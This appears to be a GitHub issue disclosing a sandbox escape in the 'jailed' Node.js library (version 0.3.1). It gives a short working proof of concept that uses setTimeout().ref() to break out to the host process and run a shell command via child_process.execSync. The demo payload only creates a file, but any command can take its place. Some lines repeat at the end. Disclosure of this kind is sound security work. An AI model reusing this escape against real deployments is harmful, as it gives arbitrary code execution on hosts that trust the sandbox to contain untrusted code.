Open seongil-wi opened 1 year ago
Jailed version: 0.3.1
Node version: 18.15.0
run-jailed.js
var jailed = require('jailed'); var api = {}; var plugin = new jailed.Plugin('./test_case.js', api);
test_case.js
try{ setTimeout().ref(); } catch(pp){ pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); }
application.disconnect();
Sandbox can be escaped by calling `setTimeout().ref()` function. Also, we can execute arbitrary shell code using process module.
Jailed version: 0.3.1
Node version: 18.15.0
run-jailed.js
test_case.js
application.disconnect();